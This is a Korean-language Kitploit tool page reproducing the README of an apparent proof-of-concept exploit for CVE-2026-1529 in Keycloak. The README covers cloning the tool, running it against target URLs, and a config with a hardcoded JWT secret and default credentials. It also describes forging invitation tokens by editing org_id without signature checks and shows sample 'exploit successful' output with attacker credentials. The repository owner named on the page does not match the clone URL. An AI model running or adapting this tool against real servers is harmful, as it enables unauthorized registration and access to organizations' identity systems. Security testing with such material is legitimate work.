Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — # CVE-2026-1529용 익스플로잇 도구 JWT 토큰 조작을 통해 Keycloak에서 무단 조직 등록을 시연하는 도구입니다. 토큰 생성, 조작, 사용자 등록 및 보고서 생성을 포함합니다. | Kitploit
도구/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationAPI Security
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

# CVE-2026-1529용 익스플로잇 도구 JWT 토큰 조작을 통해 Keycloak에서 무단 조직 등록을 시연하는 도구입니다. 토큰 생성, 조작, 사용자 등록 및 보고서 생성을 포함합니다.

저장소 보기웹사이트
6개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-1529 Keycloak 익스플로잇 도구

Keycloak: 부적절한 초대 토큰 검증을 통한 무단 조직 등록


면책 조항

이 도구는 교육 및 보안 테스트 목적으로만 제공됩니다. 명시적 테스트 권한이 있는 시스템에서만 사용하십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다. 이 도구의 작성자는 이 소프트웨어로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다.

제작자: f3ds cr3w est, 2002


개요

CVE-2026-1529는 부적절한 초대 토큰 검증을 통해 무단 조직 등록을 허용하는 Keycloak의 심각한 취약점입니다. 이 익스플로잇 도구는 JWT 토큰을 조작하여 무단 조직에 사용자를 등록함으로써 취약점을 시연합니다.

기술적 세부 사항

  • CVE ID: CVE-2026-1529
  • 영향을 받는 소프트웨어: Keycloak (org.keycloak.services.resources.organizations)
  • CVSS 점수: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • 공격 경로: 네트워크
  • 공격 복잡성: 낮음
  • 영향: 조직 리소스에 대한 무단 접근

취약점 설명

이 취약점은 조직 초대에 대한 JWT 토큰 검증 프로세스에 존재합니다. 공격자는 JWT 페이로드의 org_id 및 email 필드를 조작하여 적절한 권한 없이 모든 조직에 사용자를 등록할 수 있습니다.


설치

사전 요구 사항

  • Python 3.7 이상
  • pip 패키지 관리자

설정

  1. 익스플로잇 도구를 클론하거나 다운로드합니다:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. 필요한 종속성을 설치합니다:
root@kitploit:~
pip install -r requirements.txt
  1. 익스플로잇 스크립트를 실행 가능하게 만듭니다:
root@kitploit:~
chmod +x keycloak-exploit.py

사용법

기본 사용법

root@kitploit:~
# 대상 URL을 사용한 표준 사용법
python keycloak-exploit.py https://target-keycloak.com

# 도움말 표시
python keycloak-exploit.py -h

# 버전 표시
python keycloak-exploit.py -v

고급 사용법

root@kitploit:~
# 사용자 정의 초대 토큰 사용
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# 사용자 정의 조직 ID 사용
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# 사용자 정의 구성 파일 사용
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# 디버그 로깅 활성화
python keycloak-exploit.py -d https://target-keycloak.com

명령줄 옵션

옵션설명필수
target대상 Keycloak URL (IP 또는 도메인)예
-t, --token사용할 사용자 정의 초대 토큰아니요
-o, --org-id사용자 정의 조직 ID아니요
-c, --config구성 파일 경로아니요
-d, --debug디버그 로깅 활성화아니요
-v, --version버전 정보 표시아니요
-h, --help도움말 메시지 표시아니요

출력

성공적인 익스플로잇

익스플로잇이 성공하면 다음과 같은 출력이 표시됩니다:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

실패한 익스플로잇

익스플로잇이 실패하면 다음과 같은 출력이 표시됩니다:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

프로젝트 구조

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # 메인 익스플로잇 스크립트
├── requirements.txt             # Python 종속성
├── README.md                   # 이 파일
├── config/
│   └── default_config.json     # 기본 구성
├── utils/
│   ├── jwt_utils.py            # JWT 조작 유틸리티
│   ├── http_utils.py           # HTTP 클라이언트 유틸리티
│   └── crypto_utils.py         # 암호화 유틸리티
├── output/
│   ├── logs/                   # 로그 파일
│   └── reports/                # 익스플로잇 보고서

구성

기본 구성

이 도구는 다음 설정이 포함된 기본 구성 파일(config/default_config.json)을 사용합니다:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

사용자 정의 구성

사용자 정의 구성 파일을 생성하고 -c 옵션과 함께 사용할 수 있습니다:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

기술적 세부 사항

익스플로잇 프로세스

  1. 대상 분석: 대상이 취약한 Keycloak 인스턴스인지 확인
  2. 토큰 생성: 사용자 정의 초대 토큰 생성 또는 사용
  3. 토큰 조작: JWT 페이로드를 조작하여 조직 ID 변경
  4. 사용자 등록: 조작된 토큰을 사용하여 사용자 등록
  5. 로그인 테스트: 생성된 사용자가 로그인할 수 있는지 확인
  6. 보고서 생성: 상세 익스플로잇 보고서 생성

JWT 조작

이 도구는 다음과 같은 방식으로 부적절한 JWT 검증을 악용합니다:

  1. 서명 검증 없이 JWT 토큰 디코딩
  2. org_id 필드를 다른 조직을 대상으로 수정
  3. 필요한 경우 email 필드 수정
  4. 조작된 페이로드로 토큰 재인코딩

보안 고려 사항

  • 이 도구는 적절한 오류 처리 및 로깅을 사용합니다
  • 모든 네트워크 요청에는 적절한 헤더가 포함됩니다
  • 모든 사용자 입력에 대해 입력 검증이 수행됩니다
  • 이 도구는 대상 서버의 응답 코드를 존중합니다

문제 해결

일반적인 문제

  1. 연결 오류

    • 대상 URL에 접근 가능한지 확인
    • 대상이 Keycloak 인스턴스인지 확인
    • 네트워크 연결 및 방화벽 설정 확인
  2. 토큰 검증 오류

    • 토큰 형식이 올바른지 확인
    • 토큰에 필수 필드(org_id, email, invitation_type)가 포함되어 있는지 확인
    • 토큰이 만료되지 않았는지 확인
  3. 등록 실패

    • 등록 엔드포인트에 접근 가능한지 확인
    • 조작된 토큰 형식 확인
    • 대상에서 조직 등록이 활성화되어 있는지 확인

디버그 모드

상세 문제 해결을 위해 디버그 로깅을 활성화합니다:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

로그 파일

  • 메인 로그: logs/exploit.log
  • 보고서: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

테스트 방법론

취약점 평가

이 도구는 다음 검사를 수행합니다:

  1. 상태 확인: 대상이 Keycloak 인스턴스인지 확인
  2. 버전 탐지: Keycloak 버전 탐지 시도
  3. 엔드포인트 테스트: 조직 관련 엔드포인트 테스트
  4. 토큰 검증: JWT 토큰 구조 검증

익스플로잇 검증

다음 조건이 충족되면 익스플로잇이 성공한 것으로 간주됩니다:

  1. 대상이 취약한 경우
  2. 조작된 토큰을 사용하여 사용자를 등록할 수 있는 경우
  3. 등록된 사용자가 성공적으로 로그인할 수 있는 경우
  4. 유효한 로그인 링크가 생성된 경우

보안 모범 사례

조직을 위한

  1. 패치 적용: 최신 Keycloak 버전으로 업데이트
  2. 토큰 검증: 적절한 JWT 서명 검증 구현
  3. 접근 제어: 조직 등록을 승인된 사용자로 제한
  4. 모니터링: 의심스러운 등록 활동 모니터링
  5. 네트워크 보안: 적절한 방화벽 규칙 구현

보안 연구자를 위한

  1. 권한: 테스트 권한이 있는 시스템에서만 테스트
  2. 책임 있는 공개: 취약점을 공급업체에 보고
  3. 문서화: 테스트에 대한 상세 기록 유지
  4. 윤리적 테스트: 책임 있는 공개 관행 준수

라이선스

이 도구는 교육 및 보안 테스트 목적으로만 제공됩니다. 사용에 따른 책임은 본인에게 있습니다.

제작자: f3ds cr3w est, 2002

연락처: 질문이나 피드백은 프로젝트 저장소를 참조하십시오.


변경 로그

버전 1.0

  • 최초 릴리스
  • 기본 익스플로잇 기능
  • JWT 조작 기능
  • 보고서 생성
  • 명령줄 인터페이스

🙏 감사의 말

  • Keycloak 개발 팀
  • CVE-2026-1529를 발견한 보안 연구자들
  • 오픈소스 보안 커뮤니티

기억하세요: 큰 힘에는 큰 책임이 따릅니다. 이 도구를 현명하고 윤리적으로 사용하십시오.

by f3ds cr3w est, 2002

도구 다운로드